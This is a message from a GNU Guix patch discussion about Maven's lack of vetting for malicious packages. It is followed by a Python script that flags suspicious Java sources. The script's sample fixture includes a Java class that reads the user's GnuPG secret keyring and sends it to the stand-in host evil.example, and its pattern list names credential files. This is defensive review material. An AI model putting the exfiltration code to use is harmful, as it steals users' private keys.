GNU bug report logs - #53765
[PATCH 00/17] Remove limitations on clojure-tools


Package: guix-patches;

Reported by: Reily Siegel <mail <at> reilysiegel.com>

Date: Fri, 4 Feb 2022 00:23:01 UTC

Severity: normal

Tags: patch


From: Maxime Devos <maximedevos <at> telenet.be>
To: Reily Siegel <mail <at> reilysiegel.com>, 53765 <at> debbugs.gnu.org
Subject: [bug#53765] [PATCH 12/17] gnu: Add clojure-com-cognitect-http-client.
Date: Mon, 07 Feb 2022 20:30:04 +0100
Reily Siegel schreef op ma 07-02-2022 om 13:06 [-0500]:
> This code is taken directly from Maven, as are many Java packages. This
> relies on whatever authentication Maven does to ensure packages are not
> forgeries.

I took a look at <https://maven.apache.org> and AFAICT Maven does not
have any process in place to prevent forgeries or malicious code;
there does not appear to be any vetting process, though perhaps
I haven't looked far enough.

A web page from cognitect telling ‘grab source code from Maven
(com/cognitect/http-client)’, combined with going over the source
code to sniff things like ‘Send ~/.gnupg to evil.com’ should be
sufficient.

For the damage the absence of a vetting process can do,
see e.g. <https://lwn.net/Articles/694830/>.  The same issue
appears to hold for PyPI, RubyGems and npm.

Greetings,
Maxime.
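As an added illustration of the source-review step described in the message above (this is example code, not code from the thread, from the Guix project or from cognitect): a small Python triage helper that walks a Java source tree and reports lines that touch sensitive user files or that open network connections or spawn processes, then singles out files doing both, since that pairing is what an exfiltration attempt looks like. For a package that is itself an HTTP client, network hits on their own are expected and are only noise; the combination is the signal. The pattern list is a hypothetical starting point, and the sample sources, file names and hostname are constructed for the example.

```python
import re
from typing import Dict, List, Tuple

# Hypothetical grep-style patterns for a first pass over third-party Java
# sources. Each label names one category of behaviour worth a closer look.
SUSPICIOUS_PATTERNS = {
    # reads of files a build-time library has no business touching
    "sensitive-path": re.compile(r"\.gnupg|\.ssh|id_rsa|\.aws/credentials"),
    # resolving the user's home directory, usually a prelude to the above
    "home-dir": re.compile(r'System\.getProperty\("user\.home"\)'),
    # outbound network use via the JDK networking classes
    "network": re.compile(r"java\.net\.(?:HttpURLConnection|Socket|URL)\b|\.openConnection\("),
    # spawning external processes
    "exec": re.compile(r"Runtime\.getRuntime\(\)\.exec\(|ProcessBuilder"),
}

# Categories that, when they appear together in one file, deserve priority.
SENSITIVE = {"sensitive-path", "home-dir"}
EGRESS = {"network", "exec"}

# Constructed sample sources: an ordinary HTTP client class, and a class
# that reads the user's GnuPG keyring and pushes it to a remote host.
SAMPLE_SOURCES = {
    "src/com/example/HttpClient.java": """\
package com.example;
import java.net.HttpURLConnection;
public class HttpClient {
    public void get(String url) throws Exception {
        HttpURLConnection c = (HttpURLConnection) new java.net.URL(url).openConnection();
    }
}
""",
    "src/com/example/Telemetry.java": """\
package com.example;
import java.nio.file.Files;
import java.nio.file.Paths;
public class Telemetry {
    static byte[] keyring() throws Exception {
        String home = System.getProperty("user.home");
        return Files.readAllBytes(Paths.get(home, ".gnupg", "secring.gpg"));
    }
    static void ship(byte[] data) throws Exception {
        new java.net.Socket("evil.example", 443).getOutputStream().write(data);
    }
}
""",
}

Finding = Tuple[str, int, str, str]  # (path, line number, label, source line)


def scan_sources(sources: Dict[str, str]) -> List[Finding]:
    """Return one finding per (file, line, category) that matches a pattern."""
    findings: List[Finding] = []
    for path, text in sources.items():
        for lineno, line in enumerate(text.splitlines(), start=1):
            for label, pattern in SUSPICIOUS_PATTERNS.items():
                if pattern.search(line):
                    findings.append((path, lineno, label, line.strip()))
    return findings


def prioritise(findings: List[Finding]) -> List[str]:
    """Files that both touch sensitive data and have a way to send it out."""
    labels_by_file: Dict[str, set] = {}
    for path, _, label, _ in findings:
        labels_by_file.setdefault(path, set()).add(label)
    return sorted(path for path, labels in labels_by_file.items()
                  if labels & SENSITIVE and labels & EGRESS)


if __name__ == "__main__":
    found = scan_sources(SAMPLE_SOURCES)
    for path, lineno, label, line in found:
        print(f"{path}:{lineno}: [{label}] {line}")
    print("review first:", prioritise(found))
```

Run as a script it lists every hit with its category and then names the file that combines sensitive reads with egress; in a real review the `SAMPLE_SOURCES` dict would be replaced by the files unpacked from the Maven artifact, and the pattern list grown to the APIs the package in question actually uses. A clean run is not a verdict, only a starting point for reading the code.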
